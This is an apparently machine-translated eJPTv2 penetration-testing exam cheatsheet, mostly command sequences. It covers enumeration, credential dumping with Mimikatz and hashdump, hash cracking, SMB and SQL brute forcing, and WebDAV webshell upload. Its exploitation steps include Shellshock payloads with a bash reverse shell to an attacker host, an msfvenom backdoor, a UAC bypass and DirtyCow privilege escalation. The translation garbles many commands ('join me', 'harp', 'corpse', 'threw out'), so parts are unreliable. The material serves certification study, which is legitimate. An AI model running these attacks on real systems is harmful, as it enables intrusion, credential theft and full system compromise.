Professional Documents
Culture Documents
EJPTv2 Examen Cheatsheet.pdf.Es.en
EJPTv2 Examen Cheatsheet.pdf.Es.en
EJPTv2 Examen Cheatsheet.pdf.Es.en
com
eJPTv2 Exam
Linux:
join me -a(kernel, OS, hostname, processor )
cat /etc/issue(distro + version)
cat /etc/*release(distro + version, codename in parentheses)
send(to view environment variables)
lscpu(info. CPU) free
-h(RAM consumption)
df -h(list of hard drives and mounted drives) df -ht ext4
(only lists ext4 format units) lsblk | grep sd(list disks
and filter by annotation “sd”) dpkg -l(list of packages
installed in debian and their versions)
Meterpreter:
getuid(to see the user)
sysinfo(hostname, OS and Service Pack, architecture, system language and
domain or hostname, distro + release version, kernel and arch) C:\
\Windows\system32\eula.txt(info OS, build number, service pack)
show_mount(to show all active units)
Windows cmd:
hostname(PC name)
systeminfo(hostname, OS name, OS version, OS manufacturer, OS config,
processor, Win directory, system directory, boot device, keyboard and system
languages, total physical memory (RAM), domain, logon server and
hotfixes/updates, network card, hyper-v) wmic qfe get
Caption,Description,HotFixID,InstalledOn(info. additional
information about hotfixes/updates.Important security
updates regarding privilege escalation )
Meterpreter:
getuid(current user or user ID and group ID of the local user)
getprivs(current user privileges)
search logged_on(all the information of users logged in now and
recently and SID)
Linux:
whoami(current user)
groups(to view system groups) groups
xuser(to see xuser groups)
cat /etc/passwd(to see the system accounts, the user accounts at the end
have a console “/bin/sh or /bin/bash”)
last(last users legitimately connected to the system) lastlog(
users who connected to the system [SSH or legitimate])
Windows cmd:
whoami(current user) whoami /
priv(current user privileges)
query user(logged in users) net
users(all user accounts)
net user x(x user info)
net localgroup(all groups in the system) net
localgroup xgroup(to see the users of x group)
Meterpreter:
hashdump(Windows: pgrep lsass -> migrate PID lsass -> hashdump)
Kiwi -> help or ?->creds_all(dump all credentials
hasheadas)->lsa_dump_sam(dumps all the users' NTLM
credentials)->lsa_dump_secrets(sometimes dumps creds in plain
text)->password_change(to change the pass or hash from 1
user)
Linux:
cat /etc/shadow(with privileges)
$1$ ->MD5
$2$ ->Blowfish
$5$ ->SHA-256
$6$ ->SHA-512
search hashdump(post/linux/gather/hashdump)
Crack SHA512->john –format=sha512crypt file.txt
– wordlist=/absolutepath
hashcat -m 1800 -a 0 or 3 file.txt /pathwordlist
Windows cmd:
Mimikatz -> help or ?->privilege::debug(if it says 20 OK)->
lsadump::sam(we get syskey;SAMkey;RID[500=admin])->
lsadump::secrets -> sekurlsa::logonpassword(to get pass in
clear text if used and/or available)
Crack NTLM->john –format=NT file.txt –wordlist=/absolutepath
hashcat -m 1000 -a 0 or 3 file.txt /pathwordlist
1st LM and 2nd NTLM
Linux:
ifconfig(network cards, MAC + IP + segment)
ip as(MAC, IP + segment)
cat /etc/networks(interfaces and their configuration)
cat /etc/hosts(hosts + local domains) cat /
etc/resolv.conf(default DNS server)
harp(hosts connected to the network)
Windows cmd:
ipconfig(network adapters, DNS suffix, IPv4 and 6 addresses,
netmask and gateway)
ipconfig /all(hostname, IP routing enabled, MAC Address, DHCP
enabled [dynamic IPs], Lease expires, DHCPserver-gateway, DNS
Server)
route print(routing table)
harp(all devices on the network IP and MAC)
netstat -ano(protocols and ports of the services [0.0.0.0 are from
host])
netsh firewall show state(firewall status)
netsh advfirewall firewall dump(dump config file from firewall) netsh
advfirewall show allprofiles(whether the firewall is active or not)
EXTRA:
SMB enum:
1. NMAP SCRIPTS:
smb-server-stats –script-args
smbusername=administrator,smbpassword=passwordadmin IP (to
see how much data has been sent and received, how many logins
have failed, permission errors, system errors, tasks
printer, open files)
smb-enum-domains –script-args
smbusername=administrator,smbpassword=passwordadmin
IP (to view users, password info, complexity requirements, and
all that applies to groups)
smb-enum-groups –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(divides users into different groups)
smb-enum-services –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(lists the services you use and also specifies)
smb-shares,smb-ls –script-args
smbusername=administrator,smbpassword=passwordadmin IP
(lists the shared contents and what is in those directories [ls])
2.SMB MAP
3. nmblookup
nmblookup -h
nmblookup -A IPobj (This shows different groups and what they do.
connections [in <number>], a 20 means that we can connect to the
server)
4. Metasploit enum
SMB 1:use auxiliary/scanner/smb/smb_version (Windows version and
of samba)
SMB2:use auxiliary/scanner/smb/smb2 (to see if it supports SMB2) SMB3:
use auxiliary/scanner/smb/smb_enumshares (enumerate shares and
which are readable and writable, share types, directories, files,
time stamps, etc…)
5. enum4linux
enum4linux -h
enum4linux -S IPobj(list of users, workgroup name, if allowed null
sessions, the domain SID and OS info)
6. CONNECTION TO SMB
smbclient -h
Now we can attempt to ssh into the main server! Before that, check
the id_rsa.pub file to find the username at the end of the file.
ssh user@$ip
Quick troubleshooting:
user@IP -i id_rsa
rpcclient -h
SSH:
HTTP:
http IPobj(makes a request to the web page and outputs the headers,
here you can list the execution of some vulnerable file)
nmap scripts:
MySQL:
Connection to MySQL:
show databases; -> use xdatabase -> select count(*) from xtable;
(shows how many options there are for xtable)->select * from xitem
(to see all of xtabla's xitem)->helpto see options
Metasploit:
nmap scripts:
– script=mysql-users –script-args=”mysqluser='root',mysqlpass=''”
(lists the users of the victim PC)
– script=mysql-databases
– script-args=”mysqluser='root',mysqlpass=''”(lists the bases
server/PC data)
– script=mysql-variables
– script-args=”mysqluser='root',mysqlpass=''”(It takes out the MySQL
variables and in datadir: it tells you where they are stored on the PC)
– script=mysql-audit
– script-args=”mysql-audit.username='root',mysql-audit.password='
',mysql-audit.filename=/usr/share/nmap/nselib/data/mysql-cis.audit
”(this command audits the MySQL properties [configs], in this
case does not grant privileges to users who are not admin = PASS)
– script=mysql-dump-hashes
– script-args=”mysqluser='root',mysqlpass=''”(show the hashes
of the users of the victim PC)
nmap scripts:
ms-sql-info(service info)
ms-sq-brute –script-args
userdb=/common_users.txt,passdb=/100-common-passwords.txt
(note the users and passwords taken)
ms-sql-query –script-args
mssql.username=admin,mssql.password=pass,ms-sql-query.query
=”SELECT * FROM master..syslogins” -oN output.txt(make queries
with user credentials removed)
ms-sql-dump-hashes –script-args
mssql.username=admin,mssql.password=pass(to take out the
PC accounts and their hashes)
ms-sql-xp-cmdshell –script-args
mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell .
cmd='ipconfig'(try remote command execution
remote command)
ms-sql-xp-cmdshell –script-args
mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell
. cmd=”type C:\flag.txt”(the same but to read text files
like flags)
Metasploit:
search mssql_login -> configure options -> set verbose false ->
run(this removes users and passwords, bruteforce)
Exploitation:
Windows:
Microsoft IIS + WebDAV: (port 80/443)
Can run .asp .aspx .config and .php files
davtest(used to scan, authenticate and exploit a server
WebDAV)
davtest -url http://IPobj/webdab (it exists but we don't use creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you that
types of files we can upload and execute)
corpse(Allows uploading files, downloading, on-screen display, in-
place editing, moving, copying, creating and deleting collections,
manipulating ownership and locking resources on servers
WebDAV)
corpse –help
cadaver http://IPobj/webdav (and enter credentials) in
another terminal:ls -al /usr/share/webshells (asp in this case) then
in cadaver:put /usr/share/webshells/asp/webshell.asp
(configure it if necessary)
We return to the web browser and execute and we obtain the web shell
where we can execute commands.
Eternalblue you already know how to exploit it. MS17-010 and CVE-2017-0144
BlueKeep: CVE-2019-0708:
Exploitation:
METASPLOIT:
search winr_script_exec -> use 0 -> show options(and configure)-> set
force_vbs true -> set username and password -> exploit(Can not
work, try several times)
Linux:
Shellshock: (CVE-2014-6271)
The shellshock vulnerability is due to a vulnerability in bash, so
which, bash mistakenly executes commands after a series of characters
(){:;};
Apache servers configured to run .cgi scripts or scripts.sh
They are vulnerable to this attack.
To exploit this vulnerability, a script must be located that allows
communicate with bash.
In the context of an apache web server we can use any script
. cgi accessible from the web server
Shellshock exploitation:
We connect from the web browser to the server's web page
Apache.
We see the source code: in the <script> part we see that it
executes a .cgi file,which is saved in the root folder of the server, it is
accessible,we access the URL of the scripte.g. IPobj/gettime.cgi
We check if it is vulnerable with: nmap -sV IPobj
– script=http-shellshock –script-args
“http-shellshock.uri=/gettime.cgi”is vulnerable
Operation manual:
with burpsuite we intercept the page IPobj/script.cgi -> right click -> send
to repeater -> we replace the user-agent with:(){:;}; threw out; threw out; /bin/
bash -c 'cat /etc/passwd' -> sendand in response it comes out
the response of the executed command
Reverse shell manual:
nc -nlvp port
We return to burpsuite to the repeater and modify user-agent for this:
(){:;}; threw out; threw out; /bin/bash -c 'bash -i&/dev/tcp/IPkali/LPORTnetcat
0>&1'and we already have the reverse shell
Metasploit:
search shellshock -> use 5
(exploit/multi/http/apache_mod_cgi_bash_env_exec)->show options
-> set targeturi script.cgi -> exploit
Privilege Escalation:
Windows:
Kernel exploit:
after getting meterpreter and not being able to do getsystem:
search suggester(This post exploitation module shows the vulns and
metasploit modules that can be used to elevate privileges)->
select the one you want, configure it and launch it
Manual:
go back to meterpreter -> shell -> sysinfo ->copy info to a file
text->control+c to go back to meterpreter -> open another terminal and
create a text file with nano and paste the previous information We
look for the windows-exploit-suggester folder -> we execute
the python script and add –update ->then
. /windows-exploit-suggester.py –databasethecreatedupdate
–systeminfothe above text file (the exploits that are most
above are more likely to work)
Log back in without meterpreter privileges and go to the Temp folder
-> upload/route/exploit/chosen->shell -> .\exploit.exe 7(where 7 is
the OS version - windows 7)->they give us a new shell with all
the privileges.
UAC Bypass with UACme:
See UACme github repo to see the technique for the OS
suitable:
We have access to a Windows with a user account from the admins
group. local -> cmd -> net users(the current account is IEUser)->net
localgroup administrators -> when opening cmd as
admin bypasses the UAC.
In meterpreter:
sysinfo(write it down)->pgrep explorer -> migrate PIDexplorer ->
getuid(we are user of the admin group)->getprivs(has few
privileges)->shell -> net user -> net localgroups administrator ->
net user admin password123(access denied = UAC) we go to the
UACme repo on github and download the appropriate version ->
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipkali
LPORT=availableport -f exe > backdoor.exe We open another
metasploit and use multi/handler(configure it the same as the
msfvenom payload)->run
We return to the admin meterpreter session -> go to Temp and if it is not
in the root folder, create it with mkdir -> upload backdoor.exe ->
upload /root/Desktop/tools/UACME/Akagi64.exe(UAC elected from
repo according to OS)->shell -> dir -> .\Akagi64.exe 23 C:
\Temp\backdoor.exe(and in the multi/handler we should already have
privileged session)
Linux:
Kernel exploit:
We need to know the kernel version
Metasploit Meterpreter + Linux Exploit Suggester: sysinfo
(OS + version + kernel);getuid(we are unprivileged users
[even a service like www-data is worth it])
cd /tmp -> upload ~/Desktop/Linux-Enum/les.sh -> chmod +x les.sh
- > . /les.sh(lists vulns and exploits, also says architecture and
kernel version)->We download DirtyCow fromexploit-db.com
(it is written in C)->mv 40839.c dirty.c(we rename)->gcc
- pthread dirty.c -o dirty -lcrypt (we follow compilation instructions
of the exploit which are within it)->we go back to meterpreter
and upload ~/Downloads/dirty(we upload executable
compiled)-> /bin/bash -i -> chmod +x dirty -> ./dirty(enter password if I
want)->gives an error because it is not compiled on the machine
aim -> I go back to meterpreter -> shell -> /bin/bash -i ->gcc
- pthread dirty.c -o dirty -lcrypt -> chmod +x dirty -> ./dirty
password123(creates a firefart user who is root and backups /etc/
passwd before creating it; now we have a firefart user with the
password password123)->your firefart(It doesn't work but it's in SSH
too)->ssh firefart@IPobj(do what you ask and then log in)-> Being
root we can do cat /etc/shadowto see the hashes of the
user passwords.
with NIKTO:
NIKTO WEB APP VULN SCAN TUTORIAL
Windows:
x64:
i686-w64-mingw32-gcc exploit.c -o exploit(export to portable
executable)
If it gives an error, after -gcc there are -arguments, tab to see them
x32:
i686-w64-mingw32-gcc exploit.c -o exploit -lws2_32
Linux:
use gcc tool directly
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Meth
odology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://www.revshells.com/